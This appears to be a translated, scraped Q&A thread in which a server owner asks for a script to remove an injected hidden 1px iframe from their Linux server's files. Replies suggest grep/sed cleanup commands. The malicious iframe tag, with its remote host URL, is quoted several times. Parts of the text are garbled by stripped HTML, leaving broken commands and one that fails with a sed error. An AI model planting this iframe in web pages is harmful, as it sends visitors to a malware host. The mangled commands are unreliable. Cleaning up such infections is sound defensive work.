正在查找从linux服务器删除iframe恶意软件的脚本
我正在寻找从我的linux服务器上删除以下iframe恶意软件的脚本:正在查找从linux服务器删除iframe恶意软件的脚本,iframe,malware,Iframe,Malware,我正在寻找从我的linux服务器上删除以下iframe恶意软件的脚本: <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe> 感谢您的帮助:) 干杯 Dee在sed正则表达式中从url取消反斜杠。在sed正则表达式中从url取消反斜杠。这应
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
感谢您的帮助:)
干杯
Dee在sed正则表达式中从url取消反斜杠。在sed正则表达式中从url取消反斜杠。这应该是一个更通用的解决方案。实际上,恶意软件所做的就是查找
,并在这之前注入iframe
。因此,您可以查找位于
之前的iframe
,并将其替换为
#对文本递归grep
#转义文件名中的所有空格
#全局搜索并替换为body标记
grep-Rl“*| sed's//\/g'| xargs sed-i's///g”
我发现,通过在末尾使用
.hacked
重命名扩展名,快速删除所有受损文件也很有用。然后,您可以修复该漏洞,并最终删除.hacked
这应该是一个更通用的解决方案。实际上,恶意软件所做的就是查找
,并在这之前注入iframe
。因此,您可以查找位于
之前的iframe
,并将其替换为
#对文本递归grep
#转义文件名中的所有空格
#全局搜索并替换为body标记
grep-Rl“*| sed's//\/g'| xargs sed-i's///g”
我发现,通过在末尾使用.hacked
重命名扩展名,快速删除所有受损文件也很有用。然后,您可以修复该漏洞,并最终删除.hacked
grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
sed: -e expression #1, char 49: unknown option to `s'